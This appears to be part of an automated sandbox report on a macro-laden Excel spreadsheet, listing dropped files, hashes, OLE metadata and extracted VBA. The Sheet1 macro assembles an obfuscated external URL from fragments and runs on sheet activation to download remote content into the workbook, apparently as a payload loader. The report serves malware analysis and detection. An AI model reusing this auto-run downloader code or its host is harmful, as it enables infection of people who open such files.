                                                                                                                                                          SHA1:904A4D8EE1639003E636BD434F066B33308654AF
                                                                                                                                                          SHA-256:FE4F12EB6414CAC4845EF34C6FBF5A3FFC6C1ADD51C56E2FB5D058F90361A03B
                                                                                                                                                          SHA-512:E66A8B40BEB1DDDB11A28D832B66096C9817486003D6F29FABC9391FEFB5B9BA313FF36243DA28A8D23CE1476466B96E3F391964617ED2CB7C73233867A2E471
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: .....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N.W.7'....(.i..`.8{6....X.C...3N.y[..|*..|.....YS/q'..f_...$.g..'D...e....F.x....-b.T...4.0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36
                                                                                                                                                          Entropy (8bit):2.730660070105504
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                          MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                          SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                          SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                          SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):1.4172860556164644
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:B//FFaV:p/Hu
                                                                                                                                                          MD5:E698F24BC9310DEFAFA33DC18788A7FD
                                                                                                                                                          SHA1:68B43654690AA4ABF0E5EE8D878240FF9FA8F588
                                                                                                                                                          SHA-256:488C20172E44B59D6D2A3B25E5059E4EDEF39282A7960E325CA99D0596B4524E
                                                                                                                                                          SHA-512:5A7D53C9592E8B78B8C7E06D71C84FFFCE0A8279D0E6C4BF9E50ACA8D66410FAA176A788EF675D71B13AA3BEF871E9293D501A01FE302CD3AF522129BF4EB789
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: 216041. Admin.
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\617A6017-3014-4CF5-A8EA-F75B714BAAF0
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):129952
                                                                                                                                                          Entropy (8bit):5.378350056332974
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:+cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:cmQ9DQW+zBX8u
                                                                                                                                                          MD5:128DBF8C46E8139662B35A0CC4157738
                                                                                                                                                          SHA1:FE6D65207AC0671A57A6EE362D89BBDC7EECF2CB
                                                                                                                                                          SHA-256:776598D04D9B6E6F0E19C0C2D63E73475D1EDB99239FA1AFA884C4CB8897A0DD
                                                                                                                                                          SHA-512:4326161E7CB3D3407EBE2E1B9BFDA8FF5B2C326B29FED16B20772F585DBB759108B1CB8EE3962F4068EBE085B1718CEF4A5BC65DE10C4CF36CACC18D286C9A58
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T07:55:16">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ED120000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):47395
                                                                                                                                                          Entropy (8bit):7.751135057057903
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:8VuhzHYkZ6Z0xeyLkcTcNvL0h4utZss/aEf/WBQ/e4py+vz:8VuhEkZ6tcTcNvIh4utZsSaO/WCWh+vz
                                                                                                                                                          MD5:A6236930282FAC3FC1646B9C0AB4B3D1
                                                                                                                                                          SHA1:E22EA64D9D73EADC161443708813185836D0CC6B
                                                                                                                                                          SHA-256:BEBB34F7015B6B46347DC152FBE96B03A4BCF38D36598545D9CBD07CAF3ADFD6
                                                                                                                                                          SHA-512:04AC96CB4A9C250B095E292915F2B364BC27057D7D2FA0B815EF4C407CB9144A627536976F8A44C1AD7900F629B6BB7FC3C8BB6A72D7BAE8ABBB0639F66063D9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: .V..!.}OU.a.....T*...<&[Y....Cd....O..&..qV..2.2}.ih..Z.X......=R..V*3.._.o.gR.........r5|..?^9..F.0 U...cATP.@...3S.k..1...].z...&..eL.d...S~.cq...J&.b...Q..wN+.#.e.#.#).t..H+.j...y.2T....y....b...a...t.F..bd..*..;L}.C...&..n.W.....w^c.l....sz.$-M.JX..4.Ok...6|...2...0..sh`.u.s..B.....oe...-~G..Gd..:....^.../....#......Q...s8..K.GK.7*...z..N..E[.+.X~..%.......\+k.6.{.../.......Cz~.$....u...S..t..I..')...(9.....=^....r..bT..8.I....b.o...".v...f....,Y.&.....]@..{r...E....G.[Sw..-.....K...,{..........PK..........!.-|.$............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):170164
                                                                                                                                                          Entropy (8bit):4.363228647751794
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:fLMKLfolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fVc8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                          MD5:585D4D9F489465C7910F738F54015231
                                                                                                                                                          SHA1:8D7DDBDD54965DB24B8DB697D2847402AAA38401
                                                                                                                                                          SHA-256:01D994455C78DACD432531EED4FF112C0E860C5B7B1A70774C9D2059065BAA14
                                                                                                                                                          SHA-512:7304543BBFCDC591C77BFE8F91852B5E324049067233FFCA0112691EE1D50B52D3B0210F85A907CF670EA5FE984F4700978DFE3CAE1E090E9C35C6355287D76F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 19:05:17 2019, mtime=Thu Nov 19 15:55:42 2020, atime=Thu Nov 19 15:55:42 2020, length=8192, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):920
                                                                                                                                                          Entropy (8bit):4.682108861205002
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:8ECDU9peCHqDGqgkXe/6AEeM8+WMEjAt/rbD7b1e0b1eZ44t2Y+xIBjKZm:8EOVglLNMxQAtvDuw7aB6m
                                                                                                                                                          MD5:0616211745B3EB0F248AE7A299558A42
                                                                                                                                                          SHA1:E9496DE0593D39EEFC0C21B76F15493F6B78C5D7
                                                                                                                                                          SHA-256:E789AF734829983C00D4210911915144074ABB97CCD20B54F202B63D8663ACA2
                                                                                                                                                          SHA-512:AA61E1470D056BDB2A04AA90EACBE224D5AC843E0BE30C08D0DAE992F7CE8F0E95B0723FB7C3D145BCC654528583627BB1E5029E8033C685613367F91EEB50F3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: L..................F........)...#-...N............. ...........................P.O. .:i.....+00.../C:\...................x.1......N...Users.d......L..sQ.....................:.......1.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\.1.....>Q.{..user~1..D.......N..sQ......S.....................a.f.r.o.n.t.d.e.s.k.....~.1.....sQ....Desktop.h.......N..sQ.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......I...............-.......H...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A....`.......X.......216041...........!a..%.H.VZAj...8T...............!a..%.H.VZAj...8T..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):26
                                                                                                                                                          Entropy (8bit):4.315824333525707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:bDesBVov:bSsjy
                                                                                                                                                          MD5:1063941D0DFB4EEF54E229F8824BBF78
                                                                                                                                                          SHA1:F5D426DD401DEF6D899B39A724A2CBD49B5E723C
                                                                                                                                                          SHA-256:1F5532486F511ECE84285BB578119EF28A15A44E4E63DC63C92F2EAEA5D7A25D
                                                                                                                                                          SHA-512:82DAA6F61F7FB49FA88660101915700B66F2B4E285559B8381902239922D83FFAD76C970D25FCEEC4C2E716733453789575B76A52E5C75CDF4A277F71770B696
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: [folders]..Desktop.LNK=0..
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22
                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 18 06:47:39 2020, Security: 0
                                                                                                                                                          Entropy (8bit):4.360697246981449
                                                                                                                                                          TrID:
                                                                                                                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                          File name:doc2227740.xls
                                                                                                                                                          File size:88576
                                                                                                                                                          MD5:b43d8b40f9ef15965d0ff901e30c2f32
                                                                                                                                                          SHA1:3c0d89ac4b439b7cf60b6cc6e4195a8ce3514572
                                                                                                                                                          SHA256:196588a7404c90ab92502926afa24fbb25bf67c0ad50dba4f7ff4f1937816dda
                                                                                                                                                          SHA512:57e42961b4ffe2b4233e05e8619a4dd59a9f00a7c68bf4cc57843cb6f3803c51c727287d9407c4787b5fb8be2caff1105e30abd4c82c9ccc3b335ff9e754c72e
                                                                                                                                                          SSDEEP:1536:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAUA4duNxABg/geJtJSuAO1arCFsi:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QD
                                                                                                                                                          File Content Preview:........................>...................................P..................................................................................................................................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "doc2227740.xls"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:True
                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                          Encrypted Document:False
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                          Summary

                                                                                                                                                          Code Page:1251
                                                                                                                                                          Author:
                                                                                                                                                          Keywords:
                                                                                                                                                          Last Saved By:
                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                          Last Saved Time:2020-11-18 06:47:39
                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                          Security:0

                                                                                                                                                          Document Summary

                                                                                                                                                          Document Code Page:1251
                                                                                                                                                          Category:PmFbdwr0TuP
                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                          Manager:
                                                                                                                                                          Company:
                                                                                                                                                          Contains Dirty Links:False
                                                                                                                                                          Shared Document:False
                                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                                          Application Version:983040

                                                                                                                                                          Streams with VBA

                                                                                                                                                          VBA File Name: Sheet1.cls, Stream Size: 5844
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                          VBA File Name:Sheet1.cls
                                                                                                                                                          Stream Size:5844
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . l : . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . . b R 3 N M . f I . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . # I . A . . X N . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . # I . A . . X N . . . V . . . b R 3 N M . f I . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 16 01 00 03 00 01 00 00 cc 05 00 00 e4 00 00 00 38 02 00 00 fb 05 00 00 09 06 00 00 85 10 00 00 00 00 00 00 01 00 00 00 a7 f5 6c 3a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 d1 cf 0f 62 52 33 4e 4d 98 66 49 f6 90 cb a7 dd 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          BackgroundQuery:=False
                                                                                                                                                          TEXTJOIN(Delimiter
                                                                                                                                                          .AdjustColumnWidth
                                                                                                                                                          True,
                                                                                                                                                          (Len(x)
                                                                                                                                                          seconds)
                                                                                                                                                          .WebConsecutiveDelimitersAsOne
                                                                                                                                                          Public
                                                                                                                                                          .WebFormatting
                                                                                                                                                          Resume
                                                                                                                                                          Mid(TEXTJOIN,
                                                                                                                                                          "Range"
                                                                                                                                                          ActiveSheet.QueryTables.Add(Connection:=
                                                                                                                                                          While
                                                                                                                                                          .WorkbookConnection.Delete
                                                                                                                                                          False
                                                                                                                                                          Wait(seconds
                                                                                                                                                          "htt"
                                                                                                                                                          www.TheSpreadsheetGuru.com
                                                                                                                                                          xlInsertDeleteCells
                                                                                                                                                          MakeWebQuery
                                                                                                                                                          String,
                                                                                                                                                          Cell.Value
                                                                                                                                                          Excel
                                                                                                                                                          "lol"
                                                                                                                                                          String
                                                                                                                                                          MakeWebQuery()
                                                                                                                                                          Len(RangeArea)
                                                                                                                                                          Len(Cell.Value)
                                                                                                                                                          .Refresh
                                                                                                                                                          Destination:=
                                                                                                                                                          .WebSelectionType
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          shFirstQtr
                                                                                                                                                          Range
                                                                                                                                                          .FillAdjacentFormulas
                                                                                                                                                          "ps:"
                                                                                                                                                          .PreserveFormatting
                                                                                                                                                          .BackgroundQuery
                                                                                                                                                          "info.p"
                                                                                                                                                          .WebDisableDateRecognition
                                                                                                                                                          Through
                                                                                                                                                          RangeArea
                                                                                                                                                          VB_Base
                                                                                                                                                          Boolean,
                                                                                                                                                          .WebSingleBlockTextImport
                                                                                                                                                          .PostText
                                                                                                                                                          Given
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Input
                                                                                                                                                          Entered
                                                                                                                                                          Integer)
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          Empty
                                                                                                                                                          (Timer
                                                                                                                                                          Ignore_Empty
                                                                                                                                                          .WebPreFormattedTextToColumns
                                                                                                                                                          ParamArray
                                                                                                                                                          .SavePassword
                                                                                                                                                          'SOURCE:
                                                                                                                                                          "info"
                                                                                                                                                          Worksheet_Activate()
                                                                                                                                                          Error
                                                                                                                                                          .WebDisableRedirections
                                                                                                                                                          Attribute
                                                                                                                                                          'PURPOSE:
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          Timer()
                                                                                                                                                          VB_Name
                                                                                                                                                          Private
                                                                                                                                                          TypeName(RangeArea)
                                                                                                                                                          CONCAT
                                                                                                                                                          "//sherpa"
                                                                                                                                                          Function
                                                                                                                                                          Variant
                                                                                                                                                          xlWebFormattingNone
                                                                                                                                                          Len(Delimiter)
                                                                                                                                                          VB_Customizable
                                                                                                                                                          ".rest/wp-"
                                                                                                                                                          "pic"
                                                                                                                                                          DoEvents
                                                                                                                                                          '.RefreshStyle
                                                                                                                                                          xlEntirePage
                                                                                                                                                          swedr
                                                                                                                                                          'Text
                                                                                                                                                          "URL;"
                                                                                                                                                          Delimiter
                                                                                                                                                          .RefreshOnFileOpen
                                                                                                                                                          .RowNumbers
                                                                                                                                                          'Loop
                                                                                                                                                          Variant)
                                                                                                                                                          Replicates
                                                                                                                                                          Worksheet_Calculate()
                                                                                                                                                          TEXTJOIN
                                                                                                                                                          .RefreshPeriod
                                                                                                                                                          TEXTJOIN("",
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet1"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                            Sub Wait(seconds As Integer)
                                                                                                                                                                Dim now As Long
                                                                                                                                                                now = Timer()
                                                                                                                                                                Do
                                                                                                                                                                    DoEvents
                                                                                                                                                                Loop While (Timer < now + seconds)
                                                                                                                                                              End Sub
                                                                                                                                                              
                                                                                                                                                          Public Function TEXTJOIN(Delimiter As String, Ignore_Empty As Boolean, ParamArray Text1() As Variant) As String
                                                                                                                                                          'PURPOSE: Replicates The Excel 2016 Function CONCAT
                                                                                                                                                          'SOURCE: www.TheSpreadsheetGuru.com
                                                                                                                                                          
                                                                                                                                                          Dim RangeArea As Variant
                                                                                                                                                          Dim Cell As Range
                                                                                                                                                          
                                                                                                                                                          'Loop Through Each Cell in Given Input
                                                                                                                                                            For Each RangeArea In Text1
                                                                                                                                                              If TypeName(RangeArea) = "Range" Then
                                                                                                                                                                For Each Cell In RangeArea
                                                                                                                                                                  If Len(Cell.Value) <> 0 Or Ignore_Empty = False Then
                                                                                                                                                                    TEXTJOIN = TEXTJOIN & Delimiter & Cell.Value
                                                                                                                                                                  End If
                                                                                                                                                                Next Cell
                                                                                                                                                              Else
                                                                                                                                                                'Text String was Entered
                                                                                                                                                                  If Len(RangeArea) <> 0 Or Ignore_Empty = False Then
                                                                                                                                                                    TEXTJOIN = TEXTJOIN & Delimiter & RangeArea
                                                                                                                                                                  End If
                                                                                                                                                              End If
                                                                                                                                                            Next RangeArea
                                                                                                                                                          
                                                                                                                                                          TEXTJOIN = Mid(TEXTJOIN, Len(Delimiter) + 1)
                                                                                                                                                          
                                                                                                                                                          End Function
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          Sub MakeWebQuery()
                                                                                                                                                          ll = "htt"
                                                                                                                                                          Set shFirstQtr = Workbooks(1).Worksheets(1)
                                                                                                                                                           ll = ll & "ps:"
                                                                                                                                                          Set shFirstQtr2 = Workbooks(1).Worksheets(1)
                                                                                                                                                           swedr = "pic"
                                                                                                                                                           ll = ll & "//sherpa"
                                                                                                                                                          Set shFirstQtr3 = Workbooks(1).Worksheets(1)
                                                                                                                                                           kol = "   kol"
                                                                                                                                                           ll = ll & ".rest/wp-" & Empty & Empty & "" & "info.p"
                                                                                                                                                           der5 = "lol"
                                                                                                                                                           Set shFirstQtr4 = Workbooks(1).Worksheets(1)
                                                                                                                                                           ll = ll & "hp"
                                                                                                                                                           
                                                                                                                                                          On Error Resume Next
                                                                                                                                                           ThisWorkbook.Sheets(2).Activate
                                                                                                                                                              With ActiveSheet.QueryTables.Add(Connection:=         "URL;" & ll, Destination:=         Range("D50"))
                                                                                                                                                                   .PostText = ""
                                                                                                                                                              .RowNumbers = False
                                                                                                                                                              .FillAdjacentFormulas = False
                                                                                                                                                              .PreserveFormatting = True
                                                                                                                                                              .RefreshOnFileOpen = False
                                                                                                                                                              .BackgroundQuery = False
                                                                                                                                                              '.RefreshStyle = xlInsertDeleteCells
                                                                                                                                                              .SavePassword = False
                                                                                                                                                              .AdjustColumnWidth = False
                                                                                                                                                              .RefreshPeriod = 0
                                                                                                                                                              .WebSelectionType = xlEntirePage
                                                                                                                                                              .WebFormatting = xlWebFormattingNone
                                                                                                                                                              .WebPreFormattedTextToColumns = True
                                                                                                                                                              .WebConsecutiveDelimitersAsOne = False
                                                                                                                                                              .WebSingleBlockTextImport = True
                                                                                                                                                              .WebDisableDateRecognition = False
                                                                                                                                                              .WebDisableRedirections = False
                                                                                                                                                              .Refresh BackgroundQuery:=False
                                                                                                                                                              .WorkbookConnection.Delete
                                                                                                                                                              End With
                                                                                                                                                              Wait 2
                                                                                                                                                              x = TEXTJOIN("", True, Range("D50:IV666"))
                                                                                                                                                              If (Len(x) > 30000) Then
                                                                                                                                                              UserForm1.TextBox1.Value = x
                                                                                                                                                              End If
                                                                                                                                                          End Sub
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          Private Sub Worksheet_Activate()
                                                                                                                                                          If UserForm1.Label1.Caption <> "info" Then
                                                                                                                                                          UserForm1.Label1.Caption = "info"
                                                                                                                                                           MakeWebQuery
                                                                                                                                                          End If
                                                                                                                                                          End Sub
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          Private Sub Worksheet_Calculate()
                                                                                                                                                          If UserForm1.Label1.Caption <> "info" Then
                                                                                                                                                          UserForm1.Label1.Caption = "info"
                                                                                                                                                           MakeWebQuery
                                                                                                                                                          End If
                                                                                                                                                          End Sub
                                                                                                                                                          VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                          VBA File Name:Sheet2.cls
                                                                                                                                                          Stream Size:977
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ [ . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 5c 5b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet2"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                          VBA File Name:Sheet3.cls
                                                                                                                                                          Stream Size:977
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
